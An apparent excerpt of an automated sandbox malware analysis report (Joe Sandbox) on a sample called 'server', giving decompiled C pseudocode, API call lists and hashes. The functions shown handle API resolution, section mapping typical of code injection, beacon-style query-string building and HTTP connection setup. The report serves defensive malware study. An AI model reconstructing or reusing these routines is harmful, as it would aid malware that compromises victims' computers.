            0x004010cf
            0x004010d1
            0x004010d1
            0x004010d1
            0x00000000
            0x004010d1
            0x00000000
            0x004010b2
            0x00401061
            0x00401061
            0x00401065
            0x00000000
            0x00000000
            0x00401065
            0x004010e5
            0x004010e5
            0x004010ec
            0x004010f1
            0x00000000
            0x00000000
            0x004010f7
            0x00401102
            0x00000000
            0x00401102
            0x004010f9
            0x004010f9
            0x004010ff
            0x00000000
            0x004010ff
            0x0040102d
            0x00401103
            0x00401108

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







            0x0040146b
            0x00401471
            0x0040147f
            0x00401486
            0x0040148b
            0x00401491
            0x00000000
            0x00401492
            0x00000000

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E3CE0 Relevance: 37.7, APIs: 25, Instructions: 222memorystringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 69%
            			E007E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x7ea3e0; // 0x2f19c48
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x7ea2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x7ea018; // 0x242da616
					asm("bswap eax");
					_t34 =  *0x7ea014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x7ea010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x7ea00c; // 0xeec43f25
					asm("bswap eax");
					_t37 =  *0x7ea348; // 0x272d5a8
					_t3 = _t37 + 0x7eb5ac; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x7ea02c,  *0x7ea004, _t112);
					_t40 = E007E467F();
					_t41 =  *0x7ea348; // 0x272d5a8
					_t4 = _t41 + 0x7eb575; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x7ea348; // 0x272d5a8
						_t8 = _t93 + 0x7eb508; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x7ea348; // 0x272d5a8
					_t10 = _t45 + 0x7eb246; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E007E472F(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x7ea348; // 0x272d5a8
						_t12 = _t88 + 0x7eb8d0; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x7ea2d8, 0, _t105);
					}
					_t106 = E007E1340();
					if(_t106 != 0) {
						_t83 =  *0x7ea348; // 0x272d5a8
						_t14 = _t83 + 0x7eb8c5; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x7ea2d8, 0, _t106);
					}
					_t107 =  *0x7ea3cc; // 0x2f19600
					_a20 = E007E6B59( &E007EA00A, _t107 + 4);
					_t53 =  *0x7ea36c; // 0x2f195b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x7ea348; // 0x272d5a8
						_t17 = _t80 + 0x7eb8be; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x7ea2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E007E2915(GetTickCount());
							_t59 =  *0x7ea3cc; // 0x2f19600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x7ea3cc; // 0x2f19600
							__imp__(_t63 + 0x40);
							_t65 =  *0x7ea3cc; // 0x2f19600
							_t66 = E007E6675(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x7e9280);
								_push(_t119);
								_t71 = E007E7563();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E007E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E007E63F6();
									}
									HeapFree( *0x7ea2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x7ea2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x7ea2d8, _t109, _t116); // executed
						}
						HeapFree( *0x7ea2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x7ea2d8, _t109, _t98); // executed
				}
				return _v16;
			}


























































            0x007e3ce0
            0x007e3ce0
            0x007e3ce0
            0x007e3cf5
            0x007e3cf7
            0x007e3cfc
            0x007e3d00
            0x007e3d08
            0x007e3d0e
            0x007e3d12
            0x007e3d1a
            0x007e3d22
            0x007e3d22
            0x007e3d24
            0x007e3d30
            0x007e3d3f
            0x007e3d44
            0x007e3d47
            0x007e3d4c
            0x007e3d4f
            0x007e3d54
            0x007e3d57
            0x007e3d63
            0x007e3d70
            0x007e3d72
            0x007e3d78
            0x007e3d7d
            0x007e3d88
            0x007e3d8a
            0x007e3d8d
            0x007e3d93
            0x007e3d95
            0x007e3d9e
            0x007e3da9
            0x007e3dab
            0x007e3dae
            0x007e3dae
            0x007e3db0
            0x007e3db5
            0x007e3dc1
            0x007e3dc3
            0x007e3dc6
            0x007e3dc8
            0x007e3dcd
            0x007e3dd1
            0x007e3dd3
            0x007e3dd8
            0x007e3de4
            0x007e3de6
            0x007e3df2
            0x007e3df4
            0x007e3df4
            0x007e3dff
            0x007e3e03
            0x007e3e05
            0x007e3e0a
            0x007e3e16
            0x007e3e18
            0x007e3e24
            0x007e3e26
            0x007e3e26
            0x007e3e2c
            0x007e3e3f
            0x007e3e43
            0x007e3e48
            0x007e3e4c
            0x007e3e4f
            0x007e3e54
            0x007e3e5e
            0x007e3e60
            0x007e3e67
            0x007e3e7f
            0x007e3e83
            0x007e3e8f
            0x007e3e94
            0x007e3e9d
            0x007e3eae
            0x007e3eb2
            0x007e3ebb
            0x007e3ec1
            0x007e3ec9
            0x007e3ece
            0x007e3edb
            0x007e3ee1
            0x007e3eed
            0x007e3ef3
            0x007e3ef4
            0x007e3ef9
            0x007e3eff
            0x007e3f05
            0x007e3f0c
            0x007e3f13
            0x007e3f19
            0x007e3f20
            0x007e3f24
            0x007e3f2f
            0x007e3f34
            0x007e3f3a
            0x007e3f43
            0x007e3f43
            0x007e3f54
            0x007e3f5a
            0x007e3f5a
            0x007e3f64
            0x007e3f64
            0x007e3f72
            0x007e3f72
            0x007e3f83
            0x007e3f83
            0x007e3f91
            0x007e3f91
            0x007e3fa2

            APIs
            • RtlAllocateHeap.NTDLL ref: 007E3D08
            • GetTickCount.KERNEL32 ref: 007E3D1C
            • wsprintfA.USER32 ref: 007E3D6B
            • wsprintfA.USER32 ref: 007E3D88
            • wsprintfA.USER32 ref: 007E3DA9
            • wsprintfA.USER32 ref: 007E3DC1
            • wsprintfA.USER32 ref: 007E3DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3DF4
            • wsprintfA.USER32 ref: 007E3E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3E26
            • wsprintfA.USER32 ref: 007E3E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007E3E79
            • GetTickCount.KERNEL32 ref: 007E3E89
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E3E9D
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E3EBB
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E6675: strcpy.NTDLL ref: 007E66BF
              • Part of subcall function 007E6675: lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
            • StrTrimA.SHLWAPI(00000000,007E9280,00000000,02F19600), ref: 007E3EED
              • Part of subcall function 007E7563: lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
              • Part of subcall function 007E7563: lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E7563: lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
              • Part of subcall function 007E7563: lstrcat.KERNEL32(00000000,?), ref: 007E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 007E3F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 007E3F13
            • lstrcat.KERNEL32(00000000,?), ref: 007E3F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 007E3F24
              • Part of subcall function 007E21A6: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007E2258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 007E3F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007E3F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02F19600), ref: 007E3F72
            • HeapFree.KERNEL32(00000000,?), ref: 007E3F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 007E3F91
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID:
            • API String ID: 186568778-0
            • Opcode ID: fae3fb8cc6bdc9323a366cf6ee5facfb5f8f311d3ca04d313769bc2e10160ebf
            • Instruction ID: 877edabc90f8e239b187afc92a467fa083be166ec75754e1e5ee2abdb92e1c31
            • Opcode Fuzzy Hash: fae3fb8cc6bdc9323a366cf6ee5facfb5f8f311d3ca04d313769bc2e10160ebf
            • Instruction Fuzzy Hash: 5C719072502285BFC711AB66DCC9E573BE8FB8C700B058524F609DB231E63DE905DB6A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7B83 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 92%
            			E007E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E007E33DC(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E007E61DA(_t56);
					} else {
						E007E61DA( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E007E7B18) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E007E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x7ea348; // 0x272d5a8
						_t15 = _t59 + 0x7eb845; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














            0x007e7b83
            0x007e7b83
            0x007e7b8e
            0x007e7b95
            0x007e7b9d
            0x007e7ba7
            0x007e7bad
            0x007e7bc0
            0x007e7bd0
            0x007e7bc2
            0x007e7bc5
            0x007e7bca
            0x007e7bca
            0x007e7bc0
            0x007e7be0
            0x007e7be6
            0x007e7beb
            0x007e7cd4
            0x00000000
            0x007e7c06
            0x007e7c09
            0x007e7c1c
            0x007e7c22
            0x007e7c27
            0x007e7c4f
            0x007e7c62
            0x007e7c6c
            0x007e7c6f
            0x007e7c75
            0x007e7c7a
            0x00000000
            0x00000000
            0x007e7c7e
            0x007e7c8a
            0x007e7c9b
            0x007e7c9d
            0x007e7cae
            0x007e7cae
            0x007e7cbe
            0x00000000
            0x007e7cd0
            0x00000000
            0x007e7cd0
            0x00000000
            0x00000000
            0x00000000
            0x007e7c27

            APIs
            • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 007E7B95
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 007E7BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 007E7BE0
            • InternetSetStatusCallback.WININET(00000000,007E7B18), ref: 007E7BF7
            • ResetEvent.KERNEL32(?), ref: 007E7C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 007E7C1C
            • GetLastError.KERNEL32 ref: 007E7C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 007E7C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 007E7C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 007E7CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 007E7CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 007E7CCA
            • GetLastError.KERNEL32 ref: 007E7CD4
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID:
            • API String ID: 2290446683-0
            • Opcode ID: ee2d140c07e500b1643e5576e692e4aae5982ff3a1f5446e03e6462326bf2ef1
            • Instruction ID: 29a3c2a0bf4305adaddf5277df30cbf39218ea4ae7acc8f2992db138c447ae66
            • Opcode Fuzzy Hash: ee2d140c07e500b1643e5576e692e4aae5982ff3a1f5446e03e6462326bf2ef1
            • Instruction Fuzzy Hash: 07419F71501288BFDB319F66DC88E5B7BBDEB8C700F204918F602D61A0E738AA45CB31
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7FC5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 111 7e7fc5-7e802a 112 7e802c-7e8046 RaiseException 111->112 113 7e804b-7e8075 111->113 114 7e81fb-7e81ff 112->114 115 7e807a-7e8086 113->115 116 7e8077 113->116 117 7e8088-7e8093 115->117 118 7e8099-7e809b 115->118 116->115 117->118 126 7e81de-7e81e5 117->126 119 7e8143-7e814d 118->119 120 7e80a1-7e80a8 118->120 122 7e814f-7e8157 119->122 123 7e8159-7e815b 119->123 124 7e80aa-7e80b6 120->124 125 7e80b8-7e80c5 LoadLibraryA 120->125 122->123 127 7e815d-7e8160 123->127 128 7e81d9-7e81dc 123->128 124->125 129 7e8108-7e8114 InterlockedExchange 124->129 125->129 130 7e80c7-7e80d7 GetLastError 125->130 136 7e81f9 126->136 137 7e81e7-7e81f4 126->137 139 7e818e-7e819c GetProcAddress 127->139 140 7e8162-7e8165 127->140 128->126 133 7e813c-7e813d FreeLibrary 129->133 134 7e8116-7e811a 129->134 131 7e80d9-7e80e5 130->131 132 7e80e7-7e8103 RaiseException 130->132 131->129 131->132 132->114 133->119 134->119 143 7e811c-7e8128 LocalAlloc 134->143 136->114 137->136 139->128 142 7e819e-7e81ae GetLastError 139->142 140->139 141 7e8167-7e8172 140->141 141->139 144 7e8174-7e817a 141->144 146 7e81ba-7e81bc 142->146 147 7e81b0-7e81b8 142->147 143->119 148 7e812a-7e813a 143->148 144->139 149 7e817c-7e817f 144->149 146->128 150 7e81be-7e81d6 RaiseException 146->150 147->146 148->119 149->139 151 7e8181-7e818c 149->151 150->128 151->128 151->139
            C-Code - Quality: 51%
            			E007E7FC5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x7e0000;
				_t115 = _t139[3] + 0x7e0000;
				_t131 = _t139[4] + 0x7e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x7e0000;
				_v16 = _t139[5] + 0x7e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x7e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x7ea1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x7ea1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x7ea1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x7ea1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x7ea1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x7ea1b8; // 0x0
										 *_t102 = _t125;
										 *0x7ea1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x7ea1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































            0x007e7fd4
            0x007e7fea
            0x007e7ff0
            0x007e7ff2
            0x007e7ff7
            0x007e7ffd
            0x007e8002
            0x007e8005
            0x007e8013
            0x007e801a
            0x007e801d
            0x007e8020
            0x007e8021
            0x007e8024
            0x007e8027
            0x007e802a
            0x007e802f
            0x007e803e
            0x00000000
            0x007e8044
            0x007e804e
            0x007e8058
            0x007e805d
            0x007e805f
            0x007e8069
            0x007e806c
            0x007e806f
            0x007e8075
            0x007e8077
            0x007e8077
            0x007e807a
            0x007e807d
            0x007e8082
            0x007e8086
            0x007e8099
            0x007e809b
            0x007e8143
            0x007e8143
            0x007e814a
            0x007e814d
            0x007e8157
            0x007e8157
            0x007e815b
            0x007e81d9
            0x007e81dc
            0x007e81de
            0x007e81de
            0x007e81e5
            0x007e81e7
            0x007e81f1
            0x007e81f4
            0x007e81f7
            0x007e81f7
            0x00000000
            0x007e815d
            0x007e8160
            0x007e818e
            0x007e8198
            0x007e819c
            0x007e81a4
            0x007e81a7
            0x007e81ae
            0x007e81b8
            0x007e81b8
            0x007e81bc
            0x007e81c1
            0x007e81d0
            0x007e81d6
            0x007e81d6
            0x007e81bc
            0x00000000
            0x007e8167
            0x007e816a
            0x007e8172
            0x007e8187
            0x007e818c
            0x00000000
            0x00000000
            0x007e818c
            0x00000000
            0x007e8172
            0x007e8160
            0x007e815b
            0x007e80a1
            0x007e80a8
            0x007e80b8
            0x007e80bb
            0x007e80c1
            0x007e80c5
            0x007e8108
            0x007e8114
            0x007e813d
            0x007e8116
            0x007e811a
            0x007e8120
            0x007e8128
            0x007e812a
            0x007e812d
            0x007e8133
            0x007e8135
            0x007e8135
            0x007e8128
            0x007e811a
            0x00000000
            0x007e8114
            0x007e80cd
            0x007e80d0
            0x007e80d7
            0x007e80e7
            0x007e80ea
            0x007e80fa
            0x00000000
            0x007e8100
            0x007e80e1
            0x007e80e5
            0x00000000
            0x00000000
            0x00000000
            0x007e80e5
            0x007e80b2
            0x007e80b6
            0x00000000
            0x00000000
            0x00000000
            0x007e80b6
            0x007e808f
            0x007e8093
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007E803E
            • LoadLibraryA.KERNELBASE(?), ref: 007E80BB
            • GetLastError.KERNEL32 ref: 007E80C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 007E80FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
